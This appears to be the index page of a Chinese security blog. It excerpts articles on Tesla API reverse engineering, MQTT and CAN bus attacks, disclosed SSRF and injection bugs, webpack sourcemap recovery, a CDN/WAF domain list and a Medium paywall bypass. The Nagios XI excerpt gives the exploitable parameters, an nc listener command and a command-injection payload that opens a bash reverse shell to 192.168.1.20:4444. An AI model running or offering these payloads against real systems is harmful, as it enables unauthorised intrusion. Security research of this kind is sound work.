Hacking All The Cars之Tesla API分析与利用(上)

该系列文章将通过逆向的方式分析Tesla远程api,并自己编写代码实现远程控制Tesla汽车。

0x00 简介

Tesla自身的app具备控车的一些功能,如解锁、温度控制、充电、行车轨迹、召唤功能等。那么可能有朋友要问了,分析app自己实现的意义是什么呢?为什么不用官方提供的app呢?而且Github也有大量开源项目。

最开始我也有同样的疑问,但是,当我去尝试了解后,发现分析api,自己可以拓展多种玩法:

  1. 挖掘潜在的隐藏功能。在漏洞挖掘过程中,总会有一些未在界面显示,被开发者隐藏起来的一些功能。这些功能一旦被我们发现,对漏洞挖掘或者实现额外的功能都有帮助。

  2. 实现批量控车功能。官方的APP同时只能控制一台汽车,无法控制多台。我们熟悉API后,我们则可以实现批量控制汽车,实现速度与激情中的控车场景,这想想都觉得很酷;

  3. 熟悉Tesla业务流程,可以深入去挖掘漏洞;

  4. 尽管目前网络上有很多Tesla的API代码或库,但是其他的车还没有。我们以Tesla为典型例子,可以将其思路和方法拓展到其他同类的汽车厂商中;

  5. 个性化定制,通过API可以按照自己习惯定制流程,控制更加灵活。还可以拓展功能,如雨天自动关闭天窗,根据情况自动制热/冷却等。甚至可以做成一个商业产品;

  6. 通过api调用,配合代理跳板实现隐藏自身,同时不会暴漏自己的imei、设备等,减少APP信息收集导致的隐私泄漏。

  7. 记录下所有关于车的数据,进行数据分析。

阅读全文 »

物联网安全之MQTT渗透实战

上一篇 物联网安全之MQTT协议安全 主要介绍了MQTT安全的一些基础知识。今天将在上一篇基础上来说说实战中MQTT的利用。

在整个物联网或车联网架构中,MQTT的部分通常应用在移动端、管理端、Web端、设备端。而MQTT协议中的三种角色是发布者(PUBLISHER)、订阅者(SUBCRIBER)、代理(BROKER)。发布者(PUBLISHER)和订阅者(SUBCRIBER)通过代理(BROKER)来发布和订阅消息。这两个角色在实际场景中主要应用是移动端、Web端、设备端;代理(BROKER)一般是服务器,可以由activemq、hivemq、emqx等许多软件来搭建。在开发过程中,不同的设备,技术特点也有所不同。其使用的协议除了mqtt外,Web端通常使用websocket的方式来进行收发消息。

mqtt应用场景
EMQ X Broker 场景

0x00 获取MQTT认证信息

目前对于MQTT的开发中的安全还尚未受到广泛关注,这使得有多种方式在移动端、Web端、设备端获取到MQTT的认证与连接信息。通过获取的信息来进一步实现越权访问、发布恶意内容等攻击。

阅读全文 »

自己的一些漏洞分析文章汇总【含0day】

前几年做的一些漏洞分析复现或预警的文章,后来做管理岗,仅对感兴趣的漏洞做分析,写文写的少了。今天整理了下,存个档。
注:由于国家政策限制,有一些只对外发了预警,详细的版本均发送给了监管机构。有一些访问404的是因为不方便公开细节。对于0day申请了cve编号,详情都发在sec-list。

  1. 【漏洞预警】pixie 在线图片编辑器全版本存在SSRF漏洞[0day]
  2. 【漏洞预警】Onethink 全版本SSRF漏洞[0day]
  3. 【漏洞预警】Struts2 最新命令执行漏洞S2-052[最新更新,PoC,漏洞绕过]
  4. Cockpit CMS SSRF漏洞 0day
  5. TPSHOP 多用户商城系统任意文件读取&&SSRF 0day
  6. 【漏洞预警】Metinfo 5.3.5- 5.3.13 SSRF漏洞[0day]
  7. 【漏洞预警】Metinfo 5.x.x版本 SQL注入漏洞
  8. 威胁情报预警:Elasticsearch勒索软件事件
  9. 威胁情报预警:Couchdb勒索事件
阅读全文 »

物联网安全之MQTT协议安全

MQTT 全称为 Message Queuing Telemetry Transport(消息队列遥测传输)是是ISO 标准(ISO/IEC PRF 20922)下基于发布/订阅范式的消息协议,由 IBM 发布。由于其轻量、简单、开放和易于实现的特点非常适合需要低功耗和网络带宽有限的IoT场景。比如遥感数据、汽车、智能家居、智慧城市、医疗医护等。

MQTT协议

MQTT协议为大量计算能力有限,低带宽、不可靠网络等环境而设计,其应用非常广泛。目前支持的服务端程序也较丰富,其PHP,JAVA,Python,C,C#等系统语言也都可以向MQTT发送相关消息。 目前最新的版本为5.0版本,可以在https://github.com/mqtt/mqtt.github.io/wiki/servers 这个连接中看到支持MQTT的服务端软件。 其中hivemq中提到针对汽车厂商的合作与应用,在研究过程中会发现有汽车行业应用了MQTT协议。

以下列举我们关心的几项:

  1. 使用发布/订阅的消息模式,支持一对多的消息发布;
  2. 消息是通过TCP/IP协议传输;
  3. 简单的数据包格式;
  4. 默认端口为TCP的1883,websocket端口8083,默认消息不加密。8883端口默认是通过TLS加密的MQTT协议。
阅读全文 »

Hacking All The Cars之CAN总线逆向

本文主要是通过ICSim(Instrument Cluster Simulator)模拟CAN协议通信,通过实践对CAN总线协议进行逆向分析。在实践过程中踩过一些坑,这里跟大家分享交流。

简介

CAN(Controller Area Network)总线是制造业和汽车产业中使用的一种简单协议,为ISO国际标准化的串行通信协议。在现代汽车中的小型嵌入式系统和ECU能够使用CAN协议进行通信,其通信是采用的广播机制,与TCP协议中的UDP差不多。各个系统或ECU(电子控制单元)都可以收发控制消息。1996年起该协议成了美国轿车和轻型卡车的标准协议之一,但是直到2008年才成为强制标准(2001年成为欧洲汽车标准)。当然1996年之前的也有可能使用CAN总线。现在,汽车的电子组件均通过CAN总线连接,针对汽车的攻击最终也都会通过CAN总线来实现。对于研究汽车安全,CAN总线协议是必须要掌握的。

阅读全文 »

免费查看Medium付费内容

Medium的文章有一些是需要花钱购买会员才可以看的,每个月有两次可以试看。超过则需要付费成为会员。

其实通过Google cache就可以绕过限制继续查看。

例如我们要查看下面的文章,发现看不了。

阅读全文 »

Nagiosxi的一个RCE漏洞利用脚本

登陆后的,比较鸡肋。4月份发现的,一直放着,后来看官网更新了,直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后,感兴趣的可以去看一下。

简要信息

版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 - 去掉)
条件:登陆后
漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php
漏洞参数:step、start、end

环境

python3
requests库,使用pip3安装即可。python3 -m pip install requests

运行

  1. 首先在远程机器上监听端口,用于反弹。命令:nc -l -v -p 4444
  2. python3 nagiox.py target (注:需带协议,如http或https)

另外,如果需要执行自己的命令,需要修改commond变量就可以了,这里也懒得改了。脚本中的命令"1|(echo+\"YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAvNDQ0NCAwPiYx\"|base64+-d+|sh+-i);#"
其实就是执行的bash -i >& /dev/tcp/192.168.1.20/4444 0>&1

代码(保存为py文件)

阅读全文 »

通过sourcemap解压缩webpack 实战

现在许多网站都使用webpack对网站打包,许多前端框架也默认配置好webpack。这会在渗透测试或挖洞过程中带来一些麻烦。这让我们极其痛苦。但是开发者忽视起潜在风险,在线上环境使用了开发环境的配置,或者配置了sourcemap允许在生产环境中使用。这使得我们有了机会。

在实际渗透过程中,许多网站还是存在这种情况。通常一般是配置了devtool: 'source-map'

我们可以在js的文件名后面加上.map,如果在这种该文件,我们则可以通过工具解压缩webpack。

或者当我们一般看到类似这样的代码时,也基本可以对其进行解压缩。

阅读全文 »

一些流行的云waf、cdn、lb的域名列表(80条)

在信息收集过程中,会遇到使用cdn、云waf等的子域名。这样在做端口扫描时就会出现大量开放的端口。这就会导致扫描时间变长,多出来许多无用的信息。这里收集了一些,大家可以用到自己的扫描器中或开源程序中,遇到域名cname使用这些域名的时候可以跳过端口检查,节省时间。

以下列表主要收集了一些大型互联网企业(腾讯、百度、滴滴、字节跳动、360、阿里巴巴、美团、京东等),然后经过人工整理出来,有遗漏在所难免,欢迎大家补充。

w.alikunlun.com
wsglb0.com
w.kunlunpi.com
elb.amazonaws.com
wswebpic.com
mig.tencent-cloud.net
cloud.tc.qq.com
qcloudcjgj.com
pop3.mxhichina.com

阅读全文 »